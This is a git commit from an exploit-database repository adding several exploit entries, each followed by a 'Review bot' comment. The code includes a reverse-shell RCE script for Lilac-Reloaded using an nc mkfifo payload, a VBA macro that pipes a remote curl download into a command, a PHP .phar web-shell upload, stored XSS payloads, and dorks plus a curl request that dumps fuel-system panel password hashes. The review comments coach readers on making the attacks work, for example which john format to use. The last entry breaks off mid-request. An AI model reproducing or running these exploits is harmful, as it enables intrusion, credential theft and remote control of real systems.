DB: 2023-04-21

18 changes to exploits/shellcodes/ghdb

Franklin Fueling Systems TS-550 - Default Password

Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information

Linux Kernel 6.2 - Userspace Processes To Enable Mitigation

Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)
Bang Resto v1.0 - 'Multiple' SQL Injection
Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)

Chitor-CMS v1.1.2 - Pre-Auth SQL Injection

GDidees CMS 3.9.1 - Local File Disclosure

Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)

Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)

ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE)
Serendipity 2.4.0 - Cross-Site Scripting (XSS)
Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)

FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)

AspEmail v5.6.0.2 - Local Privilege Escalation

File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control
Exploit-DB 2023-04-21 00:16:25 +00:00
parent 5e4b800b41
commit bd09027499
18 changed files with 1680 additions and 0 deletions


@ -0,0 +1,60 @@
# Exploit Title: Franklin Fueling Systems TS-550 - Default Password
# Date: 4/16/2023
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/)
# Version: TS-550
# Tested on: Linux/Android(termux)
Step 1 : attacker can using these dorks and access to find the panel
inurl:"relay_status.html"
inurl:"fms_compliance.html"
inurl:"fms_alarms.html"
inurl:"system_status.html"
inurl:"system_reports.html'
inurl:"tank_status.html"
inurl:"sensor_status.html"
inurl:"tank_control.html"
inurl:"fms_reports.html"
inurl:"correction_table.html"
Step 2 : attacker can send request
curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi
Step 3 : if get response that show like this
<TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION>
<DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/>
<ROLE_LIST>
<ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/>
<ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/>
<ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/>
</ROLE_LIST>
Step 4 : attacker can crack the hashesh using john the ripper
notice : most of the panels password is : admin
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
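Review bot: the title says "Default Password" but what Step 2 and Step 3 actually show is an unauthenticated configuration dump: a plain `curl` POST of `cmdWebGetConfiguration` to `/cgi-bin/tsaws.cgi` on port 10001 returns the whole `ROLE_LIST`, including the `roleAdmin`, `roleUser` and `roleGuest` password hashes, while the response itself reports `ROLE="roleGuest"`. That is the finding the entry should lead with; the default-password remark under "notice" is secondary. Step 4 should name the hash type to give john (the 13-character `PASSWORD` values have the shape of traditional DES crypt, so `--format=descrypt` is the first thing to try), and the dork on the `system_reports.html` line closes with a single quote instead of a double quote, so it will not paste cleanly. The disclaimer names Trustwave, which does not match the listed author; either cite the original Trustwave advisory this is derived from or drop the boilerplate.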


@ -0,0 +1,75 @@
# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information
# Date: 14 April, 2023
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage: https://swagger.io/
# Version: < 4.1.3
# CVE: CVE-2018-25031
# Site: https://rafaelcintralopes.com.br/
# Usage: python swagger-exploit.py https://[swagger-page].com
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.chrome.service import Service
import time
import json
import sys
if __name__ == "__main__":
target = sys.argv[1]
desired_capabilities = DesiredCapabilities.CHROME
desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"}
options = webdriver.ChromeOptions()
options.add_argument("--headless")
options.add_argument("--ignore-certificate-errors")
options.add_argument("--log-level=3")
options.add_experimental_option("excludeSwitches", ["enable-logging"])
# Browser webdriver path
drive_service = Service("C:/chromedriver.exe")
driver = webdriver.Chrome(service=drive_service,
options=options,
desired_capabilities=desired_capabilities)
driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json")
time.sleep(10)
driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json")
time.sleep(10)
logs = driver.get_log("performance")
with open("log_file.json", "w", encoding="utf-8") as f:
f.write("[")
for log in logs:
log_file = json.loads(log["message"])["message"]
if("Network.response" in log_file["method"]
or "Network.request" in log_file["method"]
or "Network.webSocket" in log_file["method"]):
f.write(json.dumps(log_file)+",")
f.write("{}]")
driver.quit()
json_file_path = "log_file.json"
with open(json_file_path, "r", encoding="utf-8") as f:
logs = json.loads(f.read())
for log in logs:
try:
url = log["params"]["request"]["url"]
if(url == "https://petstore.swagger.io/v2/hacked1.json"):
print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")
if(url == "https://petstore.swagger.io/v2/hacked2.json"):
print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")
except Exception as e:
pass
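Review bot: the title says "Swagger UI 4.1.3" while the `# Version:` line says `< 4.1.3`; CVE-2018-25031 is fixed in 4.1.3, so the affected range is `< 4.1.3` and the title should match. In the script, `webdriver.Chrome(..., desired_capabilities=desired_capabilities)` relies on a constructor argument that Selenium removed in 4.10; the same logging preference can be set with `options.set_capability("goog:loggingPrefs", {"performance": "ALL"})`, which also avoids mutating the shared `DesiredCapabilities.CHROME` dict. The detection logic writes the performance log to `log_file.json` and reads it straight back only to iterate it; filtering `logs` in memory removes both the file and the hand-built JSON (`f.write("{}]")`). Finally, the success message prints a `swagger.json` URL that was never requested; print the `hacked1.json` / `hacked2.json` URL that was actually observed so the reader can reproduce the exact check.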


@ -0,0 +1,232 @@
## Exploit Title: Linux Kernel 6.2 - Userspace Processes To Enable Mitigation
## Exploit Author: nu11secur1ty
## CVE ID: CVE-2023-1998
## Description
## Summary
The Linux kernel allows userspace processes to enable mitigations by
calling prctl with
[PR_SET_SPECULATION_CTRL](https://docs.kernel.org/userspace-api/spec_ctrl.html)
which disables the speculation feature as well as by using seccomp. We
had noticed that on VMs of at least one major cloud provider, the
kernel still left the victim process exposed to attacks in some cases
even after enabling the spectre-BTI mitigation with prctl. The same
beahaviour can be observed on a bare-metal machine when forcing the
mitigation to IBRS on boot comand line.
This happened because when plain IBRS was enabled (not enhanced IBRS),
the kernel had some logic that determined that
[STIBP](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/single-thread-indirect-branch-predictors.html)
was not needed. The IBRS bit implicitly protects against cross-thread
branch target injection. However, with legacy
[IBRS](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/indirect-branch-restricted-speculation.html),
the IBRS bit was cleared on returning to userspace, due to performance
reasons, which disabled the implicit STIBP and left userspace threads
vulnerable to cross-thread branch target injection against which STIBP
protects.
## Severity
Medium - The kernel failed to protect applications that attempted to
protect against Spectre v2 leaving them open to attack from other
processes running on the same physical core in another hyperthread.
## Vulnerable code
The Bug present on Kernel 6.2
(https://elixir.bootlin.com/linux/v6.2/source/arch/x86/kernel/cpu/bugs.c#L1196)
implements an optimization that disables STIBP if the mitgation is
IBRS or eIBRS. However IBRS doesn't mitigate SMT attacks on userspace
as eIBRS does. Setting spectre_v2=ibrs on kernel boot parameters for
bare metal machines without eIBRS support also triggers the bug.
```c
/*
* If no STIBP, IBRS or enhanced IBRS is enabled, or SMT impossible,
* STIBP is not required.
*/
if (!boot_cpu_has(X86_FEATURE_STIBP) ||
!smt_possible ||
spectre_v2_in_ibrs_mode(spectre_v2_enabled))
return;
```
## Proof of Concept
The test consists of two processes. The attacker constantly poisons an
indirect call to speculatively redirect it to a target address. The
victim process measures the mispredict rate and tries to mitigate the
attack either by calling PRCTL or writing to the MSR directly using a
kernel module that exposes MSR read and write operations to userspace.
```c
/*
gcc -o victim test.c -O0 -masm=intel -w -DVICTIM
gcc -o victim-PRCTL test.c -O0 -masm=intel -w -DVICTIM -DPRCTL
gcc -o victim-nospecctrl test.c -O0 -masm=intel -w -DVICTIM
-DMSR -DMSR_VAL=0
gcc -o victim-IBRS test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=1
gcc -o victim-STIBP test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=2
gcc -o victim-IBPB test.c -O0 -masm=intel -w -DVICTIM -DMSR
-DMSR_VAL=0 -DIBPB
gcc -o attacker test.c -O0 -masm=intel -w
*/
#include "utils.h"
#include <stdio.h>
#include <string.h>
#include <sys/prctl.h>
#ifndef PRINT_AMMOUNT
#define PRINT_AMMOUNT 1000
#endif
#define IA32_SPEC_CTRL 72
uint8_t *rdiPtr;
uint8_t unused[0x500];
uint8_t probeArray[0x1000] = {2};
uint8_t unuse2[0x500];
uint32_t f1() {}
int poison(uint8_t *srcAddress, uint8_t *dstAddress, uint64_t cpu)
{
volatile uint8_t d;
unsigned tries = 0;
unsigned hits = 0;
unsigned totalHits = 0;
unsigned totalTries = 0;
jitForLoop(srcAddress);
while (1)
{
#ifndef VICTIM
callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray);
continue;
#else
#ifdef IBPB
wrmsr_on_cpu(73, cpu, 1);
#endif
for (int i = 0; i < 100; i++)
{
d = *dstAddress;
flush((uint8_t *)&rdiPtr);
callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray);
}
if (probe(&probeArray[0]) < THRESHOLD)
{
hits++;
totalHits++;
}
totalTries++;
if (++tries % PRINT_AMMOUNT == 0)
{
printf("Rate: %u/%u MSR[72]=%d\n", hits,
tries,rdmsr_on_cpu(IA32_SPEC_CTRL,cpu));
#ifdef MSR
wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL);
#endif
tries = 0;
hits = 0;
if (totalTries >= PRINT_AMMOUNT * 10)
{
break;
}
}
usleep(1);
#endif
}
printf("Total mispredict rate: %d/%d (%.2f %)\n", totalHits,
totalTries, (float)totalHits * 100 / (float)totalTries);
}
int main(int argc, char **argv)
{
uint64_t srcAddress;
uint64_t dstAddress;
uint64_t cpu;
if (argc < 4)
{
printf("Usage: %s <srcAddress> <dstAddress> <cpuCore> \n", argv[0]);
printf("Example: %s 0x55555554123 0x55555555345 1 \n", argv[0]);
return 0;
}
srcAddress = (uint64_t)strtoull(argv[1], NULL, 16);
dstAddress = (uint64_t)strtoull(argv[2], NULL, 16);
cpu = (uint64_t)strtoull(argv[3], NULL, 16);
SetCoreAffinity(cpu);
uint8_t *rwx1 = requestMem((uint8_t *)(srcAddress & (~0xfffULL)), 0x1000);
uint8_t *rwx2 = requestMem((uint8_t *)(dstAddress & (~0xfffULL)), 0x1000);
#ifdef PRCTL
if (prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH,
PR_SPEC_FORCE_DISABLE, 0, 0) != 0)
{
perror("prctl");
}
printf("PRCTL GET value 0x%x\n", prctl(PR_GET_SPECULATION_CTRL,
PR_SPEC_INDIRECT_BRANCH, 0, 0, 0));
#endif
#ifdef MSR
printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL,
rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL);
printf("writing msr[%d]=%d on core %d \n", IA32_SPEC_CTRL, MSR_VAL, cpu);
printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL,
rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
#endif
// set up leak gadget into position
#ifdef VICTIM
rdiPtr = (uint8_t *)f1;
copyLeakGadget(dstAddress);
#else
rdiPtr = (uint8_t *)dstAddress;
copyRetGadget(dstAddress);
#endif
poison(srcAddress, dstAddress, cpu);
#ifdef MSR
printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL,
rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
#endif
}
```
Timeline
**Date reported** to Cloud providers: 31/12/2022
**Date reported** to security@kernel.org: 20/02/2022
**Date fixed:** 10/03/2023
- [torvalds/linux@6921ed9](https://github.com/torvalds/linux/commit/6921ed9049bc7457f66c1596c5b78aec0dae4a9d)
- https://kernel.dance/#6921ed9049bc7457f66c1596c5b78aec0dae4a9d
Date disclosed: 12/04/2023
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
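Review bot: the title "Userspace Processes To Enable Mitigation" does not describe the bug; the summary below it does: with legacy IBRS (`spectre_v2=ibrs`, or a CPU without eIBRS) the kernel skips STIBP because of the `spectre_v2_in_ibrs_mode(spectre_v2_enabled)` early return quoted from `bugs.c`, so a process that asked for protection via `prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, PR_SPEC_FORCE_DISABLE, ...)` stays exposed to cross-thread branch target injection from the sibling hyperthread. Retitle along the lines of "Spectre-BTI userspace mitigation bypass with legacy IBRS (STIBP not applied)". The timeline has an inconsistent year: reported to cloud providers 31/12/2022, to security@kernel.org 20/02/2022, fixed 10/03/2023; the kernel report date is presumably 2023. The PoC does `#include "utils.h"` and calls `jitForLoop`, `callGadget`, `flush`, `probe`, `requestMem`, `SetCoreAffinity`, `copyLeakGadget`, `copyRetGadget`, `rdmsr_on_cpu`/`wrmsr_on_cpu` and `THRESHOLD`, none of which are in this hunk, so the listed `gcc` lines cannot build it as published; link the original advisory repository or include the header. Two defects in the code that is shown: the final `printf` format string ends with a bare `%)`, which is an invalid conversion (it should be `%%`), and `cpu` is parsed with base 16 while the usage example passes a decimal core number. The trailing e-mail signature block does not belong in an exploit file.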


@ -0,0 +1,58 @@
## Exploit Title: Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.14.2023
## Vendor: https://www.microsoft.com/
## Software:
https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3
## Reference:
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-ID: CVE-2023-28311
## Description:
The attack itself is carried out locally by a user with authentication to
the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open a
specially crafted file from a website which could lead to a local attack on
the victim's computer. The attacker can trick the victim to open a
malicious web page by using a `Word` malicious file and he can steal
credentials, bank accounts information, sniffing and tracking all the
traffic of the victim without stopping - it depends on the scenario and etc.
STATUS: HIGH Vulnerability
[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim hit
the button of the exploit!
```vbs
Call Shell("cmd.exe /S /c" & "curl -s
http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus)
```
## Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311)
## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311)
[href](
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/)
## Proof and Exploit
[href](https://streamable.com/s60x3k)
## Time spend:
01:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
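Review bot: nothing in this hunk exercises CVE-2023-28311. The only code is a VBA `Shell` call that runs `curl -s http://... | tarator`, i.e. a macro that pipes a download into an undefined command; that is a generic macro payload, not a trigger for the Word vulnerability, and the claimed impact ("steal credentials, bank accounts information, sniffing and tracking all the traffic") is not supported by anything shown. As pasted, the string literal inside `Call Shell(...)` is broken across two lines, which VBA does not accept without a line continuation, and `"cmd.exe /S /c" & "curl ..."` concatenates with no space after `/c`. Either include the crafted document and the actual trigger (the GitHub link is the only pointer to it) or label the entry as a PoC macro, and change "Time spend" to "Time spent".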


@ -0,0 +1,99 @@
Exploit Title: Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)
Application: Serendipity
Version: 2.4.0
Bugs: Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://docs.s9y.org/
Software Link: https://docs.s9y.org/downloads.html
Date of found: 13.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
If we load the poc.phar file in the image field while creating a category, we can run commands on the system.
<?php echo system("cat /etc/passwd"); ?>
I wrote a file with the above payload, a poc.phar extension, and uploaded it.
Visit to http://localhost/serendipity/uploads/poc.phar
poc request:
POST /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC HTTP/1.1
Host: localhost
Content-Length: 1561
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWKPiba66PSVGQzc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect&serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=430b341df3f78f52691c8cf935fa04e1c05854df; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[hideSubdirFiles]=; serendipity[addmedia_directory]=; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.date; serendipity[sortorder_ordermode]=DESC; serendipity[filter][i.date][from]=; serendipity[filter][i.date][to]=; serendipity[filter][i.name]=; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=267; serendipity[imgWidth]=1000; serendipity[imgHeight]=667; serendipity[imgID]=1; serendipity[baseURL]=http%3A//localhost/serendipity/; serendipity[indexFile]=index.php; serendipity[imgName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.jpeg; serendipity[thumbName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.serendipityThumb.jpeg; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; accessibletab_mediaupload_tabs_active=0; serendipity[filter][fileCategory]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b
Connection: close
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[token]"
ae9b8ae35a756c24f9552a021ee81d56
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[action]"
admin
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[adminModule]"
media
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[adminAction]"
add
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[userfile][1]"; filename="poc.phar"
Content-Type: application/octet-stream
<?php echo system("cat /etc/passwd");?>
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_filename][1]"
poc.phar
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_directory][1]"
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[column_count][1]"
true
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[imageurl]"
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[imageimporttype]"
image
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_filename][]"
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_directory][]"
------WebKitFormBoundaryZWKPiba66PSVGQzc--
poc video : https://youtu.be/_VrrKOTywgo
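Review bot: the RCE depends on the web server executing `.phar` as PHP, which the hunk does not state; the upload only shows that `poc.phar` is accepted where `.php` presumably is not. Document that precondition (on Debian/Ubuntu the packaged `mod_php` configuration maps `.phar` to the PHP handler via `FilesMatch ".+\.ph(ar|p|tml)$"`, so the exact Apache/PHP setup behind "Tested on: Linux" matters) and the role required, since the request is an authenticated media upload through `serendipity_admin.php` and the title only says "Authenticated". The request carries a live `serendipity[author_token]`, `serendipity[token]` and session cookie from the test instance; replace them with placeholders so readers do not try to replay them. Also, `Content-Length: 1561` does not match the body as pasted, so the request has to be regenerated rather than replayed verbatim.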


@ -0,0 +1,47 @@
Exploit Title: Serendipity 2.4.0 - Cross-Site Scripting (XSS)
Author: Mirabbas Ağalarov
Application: Serendipity
Version: 2.4.0
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://docs.s9y.org/
Software Link: https://docs.s9y.org/downloads.html
Date of found: 13.04.2023
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1.Anyone who has the authority to create the new entry can do this
payload: hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E
POST /serendipity/serendipity_admin.php? HTTP/1.1
Host: localhost
Content-Length: 730
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=c74c7da50976c82e628d7a8dfdb7c9e3ebc8188b; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b
Connection: close
serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D=1681366826&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=ae9b8ae35a756c24f9552a021ee81d56&serendipity%5Btitle%5D=asdf&serendipity%5Bbody%5D=hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&serendipity%5Bextended%5D=&serendipity%5Bchk_timestamp%5D=1681366826&serendipity%5Bnew_date%5D=2023-04-13&serendipity%5Bnew_time%5D=10%3A20&serendipity%5Bisdraft%5D=false&serendipity%5Ballow_comments%5D=true&serendipity%5Bpropertyform%5D=true&serendipity%5Bproperties%5D%5Baccess%5D=public&ignore_password=&serendipity%5Bproperties%5D%5Bentrypassword%5D=&serendipity%5Bchange_author%5D=1
2. visit the entry you created
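Review bot: the impact is unclear because "Anyone who has the authority to create the new entry can do this" describes an author writing raw HTML into their own entry body (`serendipity[body]=hello<img src=x onerror=alert(3)>`), which a blog engine may allow by design. State which user role (for example the lowest author level) can save the entry, whether that role is supposed to be restricted from HTML, and for whom the payload fires (administrators viewing the backend, or public readers), because that is what separates a vulnerability from a feature. The section is numbered "2. Technical Details & POC" with no section 1, and the request again embeds a live `serendipity[token]` and session cookie that should be placeholders.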

exploits/php/webapps/51374.py Executable file

@ -0,0 +1,68 @@
#!/usr/bin/env python
"""
# Exploit Title: Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 2023-04-13
# Exploit Author: max / Zoltan Padanyi
# Vendor Homepage: https://exchange.nagios.org/directory/Addons/Configuration/Lilac-2DReloaded/visit
# Software Link: https://sourceforge.net/projects/lilac--reloaded/files/latest/download
# Version: 2.0.8
# Tested on: Debian 7.6
# CVE : N/A
The autodiscovery feature lacks any kind of input filtering, so we can add our own commands there terminated with a ;
Use at your own risk!
RCA - wild exec is ongoing without any filtering
in library/Net/Traceroute.php
181 function _setTraceroutePath($sysname)
182 {
183 $status = '';
184 $output = array();
185 $traceroute_path = '';
186
187 if ("windows" == $sysname) {
188 return "tracert";
189 } else {
190 $traceroute_path = exec("which traceroute", $output, $status);
[...]
257 function traceroute($host)
258 {
259
260 $argList = $this->_createArgList();
261 $cmd = $this->_traceroute_path." ".$argList[0]." ".$host." ".$argList[1];
262 exec($cmd, $this->_result);
"""
import requests
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="The full path of the autodiscover.php in lilac (i.e. http://127.0.0.1/lilac/autodiscovery.php", required=True)
parser.add_argument("-i", "--ip", help="Listener IP", required=True)
parser.add_argument("-p", "--port", help="Listener port", required=True, type=int)
args = parser.parse_args()
rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {args.ip} {args.port} >/tmp/f;"
body = {"request":"autodiscover","job_name":"HackThePlanet","job_description":"HackThePlanet","nmap_binary":rev_shell,"default_template":"","target[2]":"1.1.1.1"}
try:
r = requests.get(args.url)
if r.ok:
print("[+] URL looks good...moving forward...")
print("[+] Sending exploit in...")
r = requests.post(args.url,data=body)
if r.ok:
print("[+] Got HTTP 200, check your listener!")
else:
print("[-] Some kind of error happened, check the http response below!")
print(r.text)
except Exception as e:
print("General exception: " + str(e))
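Review bot: the root-cause section does not match the exploit. The quoted code is `library/Net/Traceroute.php` (`exec($cmd, $this->_result)` built from `_traceroute_path` and `$host`), but the payload is sent in the `nmap_binary` field of the `autodiscover` request, so the relevant sink is wherever `autodiscovery.php` builds the nmap command line; quote that code path instead, or explain how `nmap_binary` reaches `Net_Traceroute`. Smaller points: the `--url` help text says `autodiscover.php` in the prose and `autodiscovery.php` in the example and is missing its closing parenthesis; the shebang is `/usr/bin/env python` but the f-string in `rev_shell` requires Python 3; and "[+] Got HTTP 200, check your listener!" treats any 200 from the POST as success, although execution is only proven when the listener receives the shell, so the message should say the result is unconfirmed. The `rm /tmp/f;mkfifo /tmp/f;...|nc ...` payload also assumes `nc` and a writable `/tmp` on the target; a one-line note would save readers a failed attempt.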


@ -0,0 +1,35 @@
# Exploit Title: Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)
# Date: 2023-04-02
# Exploit Author: Rahad Chowdhury
# Vendor Homepage:
https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
# Software Link:
https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip
# Version: 1.0
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-29848
*Steps to Reproduce:*
1. First login to your admin panel.
2. then go to Menu section and click add new menu from group.
your request data will be:
POST /bangresto/admin/menu.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/111.0
Accept:
